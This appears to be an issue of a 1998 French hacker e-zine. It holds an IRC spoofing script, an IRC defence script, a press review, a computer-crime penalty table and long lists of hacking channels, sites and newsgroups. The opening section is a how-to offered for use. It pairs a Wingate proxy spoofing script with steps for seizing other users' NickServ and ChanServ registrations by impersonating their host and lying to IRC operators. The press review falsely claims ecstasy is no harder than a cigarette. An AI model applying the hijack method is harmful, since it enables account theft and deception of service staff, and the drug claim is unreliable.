Pour pouvoir hacker mIRC vous devez bien sur connaitre toutes les commandes.  Allez dans l'help de mIRC et cherchez aussi des textes sur IRC.  Il faut aussi connaitre les regles de certains serveurs (ex: irc.dal.net ).  

-----------------------------------------------------------------------------------------------------

Le Sp00fing:
Le Sp00fing est ce que tous les hackers voudraient maitriser sur IRC.  C'est tres facile!  Qu'a ton besoin pour faire ca ?  RIEN! juste un client IRC! Pourquoi spoof? Cela permet de cacher son identite sur IRC, et de pouvoir hacker des channels. (DalNet)

Wingate: 
Wingate est un proxy qui permet a plusieurs ordinateurs de se connecter a Internet avec le meme modem.  Qu'est ce que cela a avoir avec le spoofing? TOUT!  Vous pouvez utiliser Wingate pour cacher votre identite sur un serveur IRC. 

Comment utiliser wingate pour spoofer?: 
Vous avez besoin de l'ip d'un ordinateur wingate et de votre client IRC (ex: mIRC).  Copier ce script et mettez le dans votre popup menu:

--------------Copier apres cette ligne---------
Sp00f
.Connect to Wingate IP:/server $$?="Enter Wingate IP:" 23
.Connect to Undernet:/raw us.undernet.org 6667 | /raw user $$?="Enter four 
words   (la lal ala lal)" | /raw nick $$?="Enter NickName:"
.Connect to DALnet:/raw irc.dal.net 7000 | /raw user $$?="Enter four words 
(la lal   ala lal)" | /raw nick $$?="Enter NickName"
.Connect to Other:/raw $$?="Enter Server And Port#" | /raw user $$?="Enter 
four words (spoof bT hax0r blah):" | /raw nick $$?="Enter NickName:"
---------------Arretez de copier avant la ligne -----------------

Une fois que vous avez copier tout ca allez sur  mIRC et cliquez sur le 
bouton droit de votre souris et clickez: Connect to Wingate IP.  Si vous 
n'avez pas d'ip wingate demandez le ou cherchez en un vous meme.  Une fois 
connecte a un Wingate ceci devrait apparaitre:

 WinGate>NICK bT
Connecting to host NICK...Host name lookup for 'NICK' failed
USER hax0r "admin.pentagon.gov" "207.68.156.53" [ tl thG ]
Connecting to host USER hax0r "admin.pentagon.gov" "207.68.156.53" ...Host name lookup for 'USER hax0r "admin.pentagon.gov" "207.68.156.53" ' failed

C'est tout a fait normal.  Sinon il ne s'agit pas d'un IP Wingate. Une fois 
apres avoir fait ca erclickez sur le bouton droit de la souris et allez sur: 
"connect to DALnet". Ceci devrait apparaitre: connected to host 
irc.dal.net 6667 . Suivez les instructions et quand on vous demande 4 mots 
mettez un mot qui se raproche de votre nick.  Facile hein?

Hackez les mots de passe des Nickserv et des Chanserv (sur DalNet) :
C'est legerement plus complique :
  
Mots de passe Nickserv :  
C'est tres facile de les hacker.  Disons que vous voulez hacker le mot de 
passe de LameHax0r .  Tapez  /msg nickserv info lamehax0r et vous allez 
avoir quelque chose comme:

	[18:46] -NickServ- *** LameHax0r is Lamer
        [18:46] -NickServ- Last seen address: lamer@209.76.160.41
        [18:46] -NickServ- Last seen time:    Wed 04/01/98 21:53:17 GMT
        [18:46] -NickServ- Time registered:   Mon 11/03/97 02:25:52 GMT
        [18:46] -NickServ- Time now:          Wed 04/01/98 23:24:18 GMT
        [18:46] -NickServ- *** End of Info ***

Vous connaissez donc sa derniere adresse IP .  C'est ce que vous allez 
utiliser pour faire un Wingate sp00f.  Scanner l'ip avec un scanneur ouvrant 
les ports 23.  Ouvrez le port 23. Apres ca vous devez cacher votre identite 
avec wingate.  La derniere adresse connue est lamer@209.76.160.41
son  ident est lamer. Quand le spoof script vous demande 4 mots mettez
"lamer lamer lamer lamer". Quand il vous demande un nick mettez: LameHaxor . 
Vous devriez etre @209.76.160.* .  Aprez ca allez sur #operhelp et dites que 
vous avez oublier votre mot de passe.  Un IRCOP va vous poser des questions, 
inventez une histoire. ( Ne changez pas les mots de passe passwords parce que 
sinon on peut vous retrouver!).

Hacker les mots de passe des Chanserv:  
C'est presque aussi facile que pour les nickserv mais un peu plus long.  
Tapez ex: #victime type /msg chanserv info #victime et vous allez avoir:

	[19:02] -ChanServ- *** Info on #Nuke
	[19:02] -ChanServ- Founder    : lamehax0r (f00l@stupidass.lamer.com)
	[19:02] -ChanServ- Mode Lock  : off
	[19:02] -ChanServ- Last Topic : This channel is LAME!!!(lamehax0r)
	[19:02] -ChanServ- Description: For lame discussion come here....
	[19:02] -ChanServ- URL        : http://www.lamers.com
	[19:02] -ChanServ- Options    : Ident, Topic Lock(F)
	[19:02] -ChanServ- Memo level : AOP
	[19:02] -ChanServ- Registered : Fri 01/16/98 04:47:25 GMT
	[19:02] -ChanServ- Last opping: Wed 04/01/98 23:39:31 GMT
	[19:02] -ChanServ- *** End of info 

Vous savez donc que le createur du channel est (Lamehax0r) et que ca derniere 
adresse etait (f00l@stupidass.lamer.com).  Demmarer votre scanneur et scanner  
(lamer.com).  Utilisez comme ident (f00l) et trouvez son mot de passe 
Nickserv. Allez ensuite sur #operhelp en utilisant son nick et dites 
"i forgot my channel pw". Une fois que vous avez raconter une histoire le 
chan est a VOUS! 

Protection:
Une bonne protection sur IRC est tres importante. Telechargez Nukenabber 
pour ecouter les ports (www.dynasol.com/~puppet/) . 
Et copiez ce texte:

------------------Mettez ca dans ALIASES SECTION!------------------
nbb {
  %bban = $chan(0)
  if ( -u isin $$1) set %unban yes
  :one
  if %bban == 0 { unset %unban | halt }
  if ((%unban == yes ) && ($me isop $chan(%bban))) {
    mode $chan(%bban) +b $$2
    .timer 1 $remove($$1,-u) mode $chan(%bban) -b $$2
    if (($3 ison $chan(%bban)) && ($3 !isop $chan(%bban))) { kick $chan(%bban) $3 G-ban : $4- }
    dec %bban | goto one
  }
  elseif ( $me isop $chan(%bban) ) {
    mode $chan(%bban) +b $$1
    dec %bban | goto one
  }
  else { dec %bban | goto one }
}



nuke {
  
  set %port $parm3
  set %protocol $parm4
  
  
  echo 9 -s  [---------------------Connection Detected!!!---------------------] 
  set %found 0
  set %ialnum 1
  set %ccnum 1
  
  if ($1 == 0)  {
    set %nuker *!*@ $+ $2
    msg $me *** Nuke from   $+ $2   $+ on port   $+ $3   $+ ( $+   $+ $upper($4) $+  )
    msg $me *** Not found
  }
  else {
    set %nuker *!*@ $+ $1
    msg $me *** Nuke from   $+ $1   $+ on port   $+ $3   $+ ( $+   $+ $upper($4) $+  )
  }
  
  if ($ial(%nuker,0) <= 1) { set %userword user }
  else { set %userword users }
  
  echo 9 -s Found $ial(%nuker,0) %userword matching this hostmask.
  
  if ($ial(%nuker,0) == 0) { goto end }
  
  :loopnicks
  set %ccnum 1
  if ($ial(%nuker,%ialnum).nick == $null) { goto end }
  set %comchans $comchan($ial(%nuker,%ialnum).nick,0)
  echo 9 -s " $+ $ial(%nuker,%ialnum).nick $+ " was found in %comchans channels you are in.
  
  set %nukernick $ial(%nuker,%ialnum).nick
  :loopcomchan
  if ($comchan(%nukernick,%ccnum) == $null) { 
    inc %ialnum 1
    goto loopnicks
  }
  
  set %nukechan $comchan(%nukernick,%ccnum)
  if $me isop %nukechan && %nukernick !isop %nukechan {
    echo 9 -s - %nukechan - removing scum
    set %nukeban $address(%nukernick,3)
    msg $me %nukeban
    nbb -u900 $address(%nukernick,3) %nukernick Stay off port  ( $+ %port $+ )   ( $+ %protocol $+ )  !! (Eternal Thug)
    set %found 1
  }
  else {
    echo 9 -s - %nukechan - %nukernick $+ 's an op!
    set %found 1
  }
  
  inc %ccnum 1
  goto loopcomchan
  
  inc %ialnum 1
  goto loopnicks
  
  :end
  
  unset %nukernick
  unset %ialnum
  unset %ccnum
  unset %nuker
  unset %comchans
  unset %nukechan
  unset %userword
  unset %port
  unset %protocol
  
  if ((%found == 0) && ($1 != 0)) {
    .timer 1 2 /nuke 0 $2 $3 $4
  }
  unset %found
  echo 9 -s  [---------------------Connect Scan end!----------------------] 
  echo -s -
  halt
}
------------------------------------Finito!---------------------------------

Pour plus de scripts pour mIRC allez sur www.mircx.com!

Les channels de hacking sur IRC: 
	
Undernet:	#hack.fr -Tres bon channel francophone.
IRCnet	#banane -Pareil.
DalNet	#Hackers_United -Tres bon channel anglophone pour apprendre le hacking
	


Ecrit par SoD (SoD@hotmail.com)



				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/


                  _________                       _________
 		     /--------/ Revue de presse      /--------/ 
		    /-- -- --/   et des evenements. /-- -- --/
               /-- -- --/                      /-- -- --/
              /-- -- --/       par stealthyx  /-- -- --/
		 /-- -- --/                      /-- -- --/ 
            /________/                      /________/

Voila g decide de faire une revu de presse et des evenements qui m'ont 
marque. Non, ne vous inquietez po !!! je v pas faire mon autobiographie,
elle ne m'interresserait po moi meme... En fait c juste pour quittez un
peu le sujet principal du mag... Mais tout en restant prs de l'underground.
Ce qui serait bien c que vous en faites aussi... Envoyez nous des mails, 
dites nous ce que vous pensez de la societe et de tout ce qui l'entoure...
Mais n'oubliez quand meme po le sujet principal de ce zine... Ne nous 
envoyez po que des revues de presse... c gentil.

Quand je mets "par stealthyx" c tout simplement parceque je le vois
ainsi & que je sais que ma vision n'est po celle de tout le monde...


Vous connaissez Coda ??? Ben pour ceux qui n'habite po en France et pour les 
autres c un mag de techno... Qu'est ce qui pourrais bien nous interreser 
dans ce mag ??? Ceci : le 16 mai 1998 il y a eu un dece lors du tecknival
une rave bretonne. Descente des flics => "Matraques en pagaille, sound
systeme defonces ("pour se creer une ouverture"!?), femmes trainees par les
cheveux, un bus gaze dans lequel se trouvait des enfants !!!". Voila comment
c deroule ce tecknival. Les raveurs ont naturellement riposte. Et c'etait 
leur droit, si l'on prend en compte la maniere dont ont agit les agents de 
"l'ordre". 
Mais voila il y a une polemique, du  la mort du jeune raveur lors de cette
rave. Leur parent clame le meurtre, alor que l'enquete a conclu au suicide.
Une polemique que reprend l'express, magazine de droite republicaine 
franaise... Mais cette fois ce magazine traite le sujet avec + de recul :
il analyse le phenomene et l'article s'intitule "doit on avoir peur des 
raves". Pour une fois je salut le magazine, il a su reprendre le probleme 
 sa juste valeur : les raves font peur. Parceque la techno est un courant
nouveau dont peu de gens arrivent  cerner la politique...
Et c normal puisque la techno n'a aucune politique!!! C'est un courant (que
dis je une CULTURE) pluriculturelle base sur la fete et la joie de vivre...
La techno est en effet nee sur les dances floor des discoteques de Detroit, 
ou des gens venaient s'y changer les idees apres une semaine de travail...

	"one world, one future" (theme de la love parade 1998)
 
Mais si les raves sont interdites c aussi parceque les raves ont une 
description de debauche et de drogue : l'ecstasie en particulier...
Et on reprend le Coda..."Ainsi un professeur nous relate cette anecdote...
Des policiers font la tournee des lycees dans le cadre d'une vaste campagne 
de prevention contre la drogue.(...) Mais la prevention tourne  la parodie
quand en aparte des eleves, et  l'unique destination des professeurs et du
proviseur, les policiers declarent : "mefiez vous des eleves quilisent Coda.
Ce sont peut etre des dealers, surement des consommateurs."" A noter que 
l'ecstasie est aussi dur qu'une simple cigarette, et moins que l'alcool...
Et voila comment on vois les jeunes qui s'interressent aux courants nouveau.
Ils ont peur de c jeunes techno-raveurs... Comme ils ont peur des hackers
parceque "ils ont le pouvoir de semer le chaos." Alor les dirigeant de
ce beau-pays (les prefets en particulier qui poussent les raves  la 
clandestinite en leur ineterdisant des representations dans des salles 
securises) insufflent au bon parents la peur de l'inconnue, interdisent, 
censurent, mais po ce qui faut, & le fn reste...
C triste...
Mais bon, on va pas se plaindre, avec la world cup, c'est la fete tous les
jours...;)). Surtout quand une equipe black,blanc,beur gagne la coupe, et,
du coupd encule le FN...

C L'ETE !!! Et c un ete pleins de fetes!!! 
On retiendra L'AREA  Amiens, La LOVE PARADE  Berlin (ca sent de + en + le
ble), BOREALIS  Montpellier, DANCE VALLEY en Hollande  SPAARWOUDE, 
la LAKE PARADE  Geneve, ENERGY 98  Zurick suivit de la STREET PARADE. Et 
les TEKNIVALS interdites. Faut se renseigner pour savoir la date et le lieu 
des teknivals... La fetes est l, les maillots de bain aussi est Ibiza vous 
attend les bras ouvert...

Le crash de la banque anglaise tres aristocratique BEARINGS fait des remoux
dans la presse et la TV. Un reportage entier  ete fait sur Nick Leeson. 
On apprend ainsi qu'avant de partir  Singapour, il avait laisse un montant
de dettes de 400 millions de  dans un compte qu'il avait fait pour les 
cacher. Le lendemain ce montant etait de 800 million de . C beaux la bourse
!!!:)) La Bearings a ete finalement vendu  une   une societe hollandaise.
Chapeau bas pour Nick qui se tape un cancert du clon dans une cellule de
Singapour (d'apres le point) et qui c fait lacher par sa femme...
Nous on t'aime NICK!!! Bravo!!!!!!!!!!!!!!!! clap,clap,clap,clap......

Dans les lycees francais ou le ministere de l'education nationnal faisait 
passer un circulaire. Un etudiant a donc exige "des profs blondes  fortes
poitrines, des tops bonnes, pas des tons". ARF!

Cote informatique, linux se develope un peu partout en dehors de l'internet.
SVM, un magazine franais sur l'informatique habituellement centre sur 
windaube, comme les autres d'ailleurs, fait un dossier complet sur les os
alternatif, dont linux. Pc Mag aussi si met, en expliquant la maniere de 
foutre plusieur os sur sa becane... De son cote Dream continu le combat et
nous presente le nouveau noyau de linux le futur 2.2.xx :))), et commence 
un volet programmation en C. L'underground commence  ce decouvrir et c po 
+ mal... 
Alor que Microsoft cool (ouaaaa le je de mot :) sous le poid des poursuites
judicieres (hihi). Ce qui compromet durement le lancement de windaube 98, &
billou commence a prendre c attaques aux serieux : il pourrait voir toutes
son entreprise monopolistique (euuuh) divisee...hehehehehehe
Retour sur SVM d'il y a plusieur mois. Il nous devoille que meme en effacant
il reste toujour des traces des informations sur le HD. Bon ct connu mais,
comme sur l'irc y'a un mec qui nous dit qu'il a hacke une becane... Doit po
etre au courant celui-la : dites vous dors et deja que les flics peuvent 
trouver des preuves contre vous si vous avez dit ce genre de conneries 
(arf).

Cote underground on est content par ce que ca revit... Alor que la page
de NoRoute tombe sur une erreur (la censure encore une fois), des nouveaux
mags francophones apparaissent en plus de celui ci : frhack qui n'est po 
mal, mais dans lequel on remarque quelque copier-coller (les auteurs ne 
sitent pas leur source), et oui c dure d'ecrire quelque chose de neuf...:).
C quand meme un mag de qualite que vous pouvez trouver sur www.frhack.org. 
Vous pouvez aussi retrouver l'equipe sur undernet (port 6667) #hack.fr... 
Aussi un autre mag un peu moins neuf, il en est a son quinzieme numero,
mais d'actualite, Total controll. On leur souhaite  tout 2 longue vie...
Si vous avez vu d'autre mag nouveau (& pas seulement francophone) n'hesitez
po  ecrire a h_p_c_l_psite@yahoo.com.
En ce qui concerne les attaques, on estime le nombre d'ordinateur pirate  
10000 en 1997. On apprend aussi que un tribunal a renonce aux poursuites
contre un groupe de hacker : "en l'abscence de mise en place d'un systeme
de protection (...) l'acces aux ordinateur s'est effectue sans fraude".
Autre info :
_________________________________________________
Infractions :	|Emprisonnement :	|Amendes :	|
------------------|-----------------|-----------|
acces frauduleux	| 1ans		|100 000 F	|
 un reseau : 	|			|		|
------------------|-----------------|-----------| 
Atteinte involon-	| 2ans		|200 000 F	|
-taire au reseau	|			|		|
informatique :	|			|		|	
------------------|-----------------|-----------|
Atteinte volon-	| 3ans		|300 000 F	|
-taire d'un reseau|			|		|
------------------|			|		|
Manipulation fraud|			|		|
-uleuse de donnees|			|		|
------------------|			|		|
Vol de materiel   |			|		|
informatique :	|			|		|
------------------|-----------------|-----------|
Vol aggrave :	| 5ans		|500 000 F	|
------------------|-----------------|-----------|
Destruction ou de-| 1  2ans		|100 000 	|
-terioration sans |			|200 000 F	|		
danger pour les 	|			|		|
personnes :		|			|		|
------------------|-----------------|-----------|
Destruction ou de-| 2  5 ans		|2 000 000 |
-terrioration	|			|5 000 000 F|
dangeureuse pour 	|			|		|
les personnes	|			|		|
__________________|_________________|___________|

Hackez en paix...



SEPTEMBRE 1998 :
je v sur hack.fr le chan de frhack le mag....
Et qu'est ce que j'apprend : frhack le groupe n'existe p'us!!!!!
vaToo l'un des redacteurs et l'un des createur du site a fait un autre 
groupe en attendant, (sur le phreak ca specialite): Cryptel...
Mais ou est donc Utopiste ??? 
Esperons que le nouveau groupe de vaToo tienne le coups et que (on ne sait 
jamais) le groupe frhack recussite !
Amen...

Source : Dream, SVM, Coda, l'Express, Le nouvel obs, Trax...

											steal 

				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/


		|--------------------------------------------|	
  		|Les bouquins, les #, & les url interressants|							|
		|--------------------------------------------|


On vas d'abord commencer par les channels :

Les noms des # d'un serveur irc  l'autre ne changent po beaucoups, on peut
donc trouver presque  tout les coups : 

#2600
#hack
#hacker
#hacking
#phreak
#phreaker
#phreaking
#warez
#linux
#cellular
#Unix

etc... Mais lorsque vous tapez ca vous avez 90% de chance de tomber sur
un channel anglais... Si vous voullez un channel en francais par exemple
tapez : 
#hack.fr
#hacking.fr
#hacker.fr etc ...
ou bien :
#francehack
etc.......

Pour les url  present voici une liste non exostive, vous pouvez toujour
nous mailler des urls :

En anglais : 
(ces sites sont tire du faq de 2600)

Sites ftp :

 204.215.84.2            /pub/dmackey
 2600.com                                                (2600 Magazine)
 aeneas.mit.edu                                          (Kerberos)
 alex.sp.cs.cmu.edu      /links/security                 (Misc)
 asylum.sf.ca.us                                    (CyberWarriors of Xanadu)
 atari.archive.umich.edu /pub/atari/Utilities/pgp261st.zip (Atari PGP)
 athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
 atlantis.utmb.edu                                       (Anti-virus)
 bellcore.com                                            (Bellcore)
 cert.org                                                (CERT)
 ciac.llnl.gov                                           (CIAC)
 clark.net               /pub/jcase                      (H/P)
 cnit.nsk.su             /pub/security                   (Security)
 coast.cs.purdue.edu     /pub                            (Security/COAST)
 coombs.anu.edu.au       /pub/security                   (Security)
 csrc.ncsl.nist.gov                                      (NIST Security)
 dartmouth.edu           /pub/security                   (Security)
 ds.internic.net                                         (Internet documents)
 dutiws.twi.tudelft.nl   /pub/novell
 etext.archive.umich.edu /pub/Zines/PrivateLine          (PrivateLine)
 fastlane.net            /pub/nomad
 ftp.3com.com            /pub/Orange-Book                (Orange Book)
 ftp.acns.nwu.edu        /pub                            (Mac Anti-virus)
 ftp.acsu.buffalo.edu    /pub/security & /pub/irc        (Security & IRC)
 ftp.alantec.com         /pub/tcpr                       (Tcpr)
 ftp.armory.com          /pub/user/kmartind              (H/P)
 ftp.armory.com          /pub/user/swallow               (H/P)
 ftp.auscert.org.au      /pub                            (Australian CERT)
 ftp.cerf.net            /pub/software/unix/security     (CERFnet)
 ftp.cert.dfn.de                                         (FIRST)
 ftp.cisco.com                                           (Cisco)
 ftp.commerce.net        /pub/standards/drafts/shttp.txt (Secure HyperText)
 ftp.cs.colorado.edu
 ftp.cs.ruu.nl           /pub/SECURITY                   (Security & PGP)
 ftp.cs.uwm.edu          /pub/comp-privacy               (Privacy Digest)
 ftp.cs.vu.nl
 ftp.cs.yale.edu
 ftp.csi.forth.gr        /pub/security
 ftp.csl.sri.com         /pub/nides                      (SRI)
 ftp.csn.org /mpj                                        (Cryptology)
 ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
 ftp.delmarva.com
 ftp.demon.co.uk         /pub/misc/0800num.txt           (0800/0500 numbers)
 ftp.denet.dk            /pub/security/tools/satan
 ftp.digex.net           /pub/access/dunk
 ftp.dsi.unimi.it        /pub/security/crypt             (Crypto)
 ftp.dstc.edu.au         /pub/security/satan
 ftp.ee.lbl.gov
 ftp.eff.org             /pub/Publications/CuD           (EFF)
 ftp.elelab.nsc.co.jp    /pub/security                   (Security)
 ftp.etext.org                                           (Etext)
 ftp.fc.net              /pub/deadkat                    (TNO)
 ftp.fc.net              /pub/defcon                     (DefCon)
 ftp.fc.net              /pub/defcon/BBEEP               (BlueBeep)
 ftp.fc.net              /pub/phrack                     (Phrack)
 ftp.foobar.com
 ftp.funet.fi            /pub/doc/CuD
 ftp.gate.net            /pub/users/laura
 ftp.gate.net            /pub/users/wakko
 ftp.giga.or.at          /pub/hacker/                    (H/P)
 ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
 ftp.IEunet.ie           /pub/security                   (Security)
 ftp.ifi.uio.no
 ftp.indirect.com        /www/evildawg/public_access/C&N/
 ftp.info.fundp.ac.be
 ftp.informatik.uni-hamburg.de
 ftp.informatik.uni-kiel.de /pub/sources/security
 ftp.inoc.dl.nec.com     /pub/security                   (Security)
 ftp.isi.edu
 ftp.lava.net            /users/oracle/                  (H/P
 ftp.leo.org/pub/com/os/os2/crypt
 ftp.lerc.nasa.gov       /security
 ftp.llnl.gov            /pub                            (CIAC)
 ftp.luth.se             /pub/unix/security
 ftp.lysator.liu.se
 ftp.mcs.anl.gov         /pub/security
 ftp.microserve.net      /ppp-pop/strata/mac             (Mac)
 ftp.near.net            /security/archives/phrack       (Zines)
 ftp.nec.com
 ftp.net.ohio-state.edu  /pub/security/satan
 ftp.netcom.com          /pub/br/bradleym                (Virii)
 ftp.netcom.com          /pub/da/daemon9                 (H/P)
 ftp.netcom.com          /pub/fi/filbert
 ftp.netcom.com          /pub/gr/grady
 ftp.netcom.com          /pub/il/illusion                (H/P+Virus)
 ftp.netcom.com          /pub/je/jericho                 (H/P)
 ftp.netcom.com          /pub/le/lewiz                   (Social Engineering)
 ftp.netcom.com          /pub/ty/tym                     (TYM)
 ftp.netcom.com          /pub/va/vandal                  (DnA)
 ftp.netcom.com          /pub/wt/wtech/
 ftp.netcom.com          /pub/zi/zigweed                 (H/P)
 ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
 ftp.netsys.com
 ftp.ocs.mq.edu.au       /PC/Crypt                       (Cryptology)
 ftp.ox.ac.uk            /pub/comp/security
 ftp.ox.ac.uk            /pub/crypto                     (Cryptology)
 ftp.ox.ac.uk            /pub/wordlists                  (Wordlists)
 ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
 ftp.pipex.net           /pub/areacode                   (uk areacodes)
 ftp.pop.psu.edu
 ftp.primenet.com        /users/i/insphrk
 ftp.primenet.com        /users/k/kludge                 (H/P)
 ftp.primenet.com        /users/s/scuzzy                 (Copy Protection)
 ftp.primus.com          /pub/security                   (Security)
 ftp.psy.uq.oz.au
 ftp.psy.uq.oz.au        /pub/DES
 ftp.rahul.net           /pub/conquest/DeadelviS/script/vms/
 ftp.rahul.net           /pub/lps                        (Home of the FAQ)
 ftp.sert.edu.au
 ftp.sgi.com
 ftp.smartlink.net       /pub/users/mikes/haq
 ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
 ftp.std.com             /obi/Mischief/                  (MIT Guide to Locks)
 ftp.std.com             /obi/Phracks                    (Zines)
 ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
 ftp.sura.net            /pub/security                   (SURAnet)
 ftp.technet.sg
 ftp.technion.ac.il
 ftp.tis.com             /pub                            (TIS)
 ftp.tisl.ukans.edu      /pub/security
 ftp.uni-koeln.de                                        (Wordlists)
 ftp.uspto.gov
 ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
 ftp.uwp.edu             /pub/dos/romulus/cracks         (Copy Protection)
 ftp.vis.colostate.edu
 ftp.vix.com
 ftp.vortex.com
 ftp.warwick.ac.uk       /pub/cud                        (Zines)
 ftp.wi.leidenuniv.nl    /pub/security
 ftp.win.tue.nl          /pub/security                   (Security)
 ftp.winternet.com       /users/nitehwk                  (H/P)
 ftp.wustl.edu           /doc/EFF                        (EFF)
 ftp.zoom.com
 ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto    (Cryptology)
 garbo.uwasa.fi          /pc/crypt                       (Cryptology)
 gemini.tuc.noao.edu     /pub/grandi
 gti.net                 /pub/safetynet
 gumby.dsd.trw.com
 hack-this.pc.cc.cmu.edu                                 (Down for Summer)
 heffer.lab.csuchico.edu                        (Third Stone From The Sun)
 hplyot.obspm.fr
 info.mcs.anl.gov
 infonexus.com           /pub                            (The Guild)
 jerico.usc.edu
 l0pht.com                                               (The L0pht)
 lcs.mit.edu             /telecom-archives               (Telecom archives)
 lod.com                                                 (Legion of Doom)
 mac.archive.umich.edu
 mary.iia.org            /pub/users/patriot              (Misc)
 monet.ccs.itd.umich.edu
 net-dist.mit.edu        /pub/pgp
 net.tamu.edu            /pub/security/TAMU              (Security)
 net23.com               /pub                            (Max Headroom)
 nic.ddn.mil             /scc                            (DDN Security)
 nic.sura.net            /pub/security
 oak.oakland.edu         /pub/hamradio                   (Ham Radio)
 oak.oakland.edu         /SimTel/msdos/sound             (DTMF decoders)
 oak.oakland.edu         /SimTel/msdos/sysutil           (BIOS attackers)
 parcftp.xerox.com
 prism.nmt.edu           /pub/misc                       (Terrorist Handbook)
 pyrite.rutgers.edu      /pub/security                   (Security)
 relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
 rena.dit.co.jp          /pub/security                   (Security)
 research.att.com        /dist/internet_security         (AT&T)
 ripem.msu.edu           /pub/crypt                      (Ripem)
 rmii.com                /pub2/KRaD                      (KRaD Magazine)
 rtfm.mit.edu                                            (Etext)
 rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
 scss3.cl.msu.edu        /pub/crypt                      (Cryptology)
 sgigate.sgi.com         /Security                       (SGI Security)
 sierra.stanford.edu
 spy.org                                                 (CSC)
 src.doc.ic.ac.uk        /usenet/uk.telecom              (uk.telecom archives)
 suburbia.apana.org.au   /pub/unix/security              (Security)
 sunsolve1.sun.com
 theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
 titania.mathematik.uni-ulm.de /pub/security             (Security)
 toxicwaste.mit.edu      /pub/rsa129/README              (Breaking RSA)
 ugle.unit.no
 unipc20.unimed.sintef.no
 vic.cc.purdue.edu
 vixen.cso.uiuc.edu      /security
 web.mit.edu
 whacked.l0pht.com                                       (Mac + H/P)
 wimsey.bc.ca            /pub/crypto                     (Cryptology)
 wuarchive.wustl.edu     /pub/aminet/util/crypt

Les newsgroups :

 alt.2600                 Do it 'til it hertz
 alt.2600hz
 alt.2600.codez
 alt.2600.debate
 alt.2600.moderated
 alt.cellular
 alt.cellular-phone-tech  Brilliant telephony mind blow netnews naming
 alt.comp.virus           An unmoderated forum for discussing viruses
 alt.comp.virus.source.code
 alt.cracks               Heavy toolbelt wearers of the world, unite
 alt.cyberpunk            High-tech low-life.
 alt.cyberspace           Cyberspace and how it should work.
 alt.dcom.telecom         Discussion of telecommunications technology
 alt.engr.explosives      [no description available]
 alt.fan.kevin-mitnick
 alt.fan.lewiz            Lewis De Payne fan club
 alt.hackers              Descriptions of projects currently under development
 alt.hackintosh
 alt.locksmithing         You locked your keys in *where*?
 alt.hackers.malicious    The really bad guys - don't take candy from them
 alt.ph.uk                United Kingdom version of alt.2600
 alt.privacy.anon-server  Tech. & policy matters of anonymous contact servers
 alt.radio.pirate         Hide the gear, here comes the magic station-wagons.
 alt.radio.scanner        Discussion of scanning radio receivers.
 alt.satellite.tv.europe  All about European satellite tv
 alt.security             Security issues on computer systems
 alt.security.index       Pointers to good stuff in misc.security (Moderated)
 alt.security.keydist     Exchange of keys for public key encryption systems
 alt.security.pgp         The Pretty Good Privacy package
 alt.security.ripem       A secure email system illegal to export from the US
 comp.dcom.cellular       [no description available]
 comp.dcom.telecom        Telecommunications digest (Moderated)
 comp.dcom.telecom.tech   [no description available]
 comp.org.cpsr.announce   Computer Professionals for Social Responsibility
 comp.org.cpsr.talk       Issues of computing and social responsibility
 comp.org.eff.news        News from the Electronic Frontiers Foundation
 comp.org.eff.talk        Discussion of EFF goals, strategies, etc.
 comp.os.netware.security Netware Security issues
 comp.protocols.kerberos  The Kerberos authentification server
 comp.protocols.tcp-ip    TCP and IP network protocols
 comp.risks               Risks to the public from computers & users
 comp.security.announce   Announcements from the CERT about security
 comp.security.firewalls  Anything pertaining to network firewall security
 comp.security.misc       Security issues of computers and networks
 comp.security.unix       Discussion of Unix security
 comp.virus               Computer viruses & security (Moderated)
 de.org.ccc               Mitteilungen des CCC e.V.
 misc.security            Security in general, not just computers (Moderated)
 rec.pyrotechnics         Fireworks, rocketry, safety, & other topics
 rec.radio.scanner        [no description available]
 rec.video.cable-tv       Technical and regulatory issues of cable television
 sci.crypt                Different methods of data en/decryption

Les sites telnet :

 anarchy-online.com
 ntiabbs.ntia.doc.gov                  (NTIA)
 l0pht.com                             (The L0pht)
 sfpg.gcomm.com                        (The Floating Pancreas)
 telnet lust.isca.uiowa.edu 2600       (underground bbs) (temporarily down)
 pcspm2.dar.csiro.au                   (Virtual Doughnutland BBS)
 prince.carleton.ca 31337              (Twilight of The Idols)
 spy.org                               (Computer Systems Consulting)

Les sites gopher :

 ba.com                  (Bell Atlantic)
 cell-relay.indiana.edu  (Cell Relay Retreat)
 csrc.ncsl.nist.gov      (NIST Security Gopher)
 gopher.acm.org          (SIGSAC (Security, Audit & Control))
 gopher.cpsr.org         (Computer Professionals for Social Responsibility)
 gopher.eff.org          (Electonic Frontier Foundation)
 gopher.panix.com        (Panix)
 gw.PacBell.com          (Pacific Bell)
 iitf.doc.gov            (NITA -- IITF)
 info.itu.ch             (International Telegraph Union)
 ncjrs.aspensys.com      (National Criminal Justice Reference Service)
 oss.net                 (Open Source Solutions)
 spy.org                 (Computer Systems Consulting)
 wiretap.spies.com       (Wiretap)

Les sites World wide Web :

 134.220.198.66:8000                           (Peter Strangman's)
 alcuin.plymouth.edu/~jay/underground.html     (Underground Links)
 all.net                 (American Society for Industrial Security Management)
 alumni.caltech.edu/~dank/isdn/                (ISDN)
 asearch.mccmedia.com/www-security.html        (WWW-security info)
 aset.rsoc.rockwell.com                        (NASA/MOD AIS Security)
 aset.rsoc.rockwell.com/exhibit.html           (Tech. for Info Sec)
 att.net/dir800                                (800 directory)
 ausg.dartmouth.edu/security.html              (UNIX Security Topics)
 bianca.com/bump/ua                            (Unauthorized Access Home Page)
 ccnga.uwaterloo.ca/~jscouria/gsm.html         (GSM Specification)
 cell-relay.indiana.edu/cell-relay             (Cell Relay Retreat)
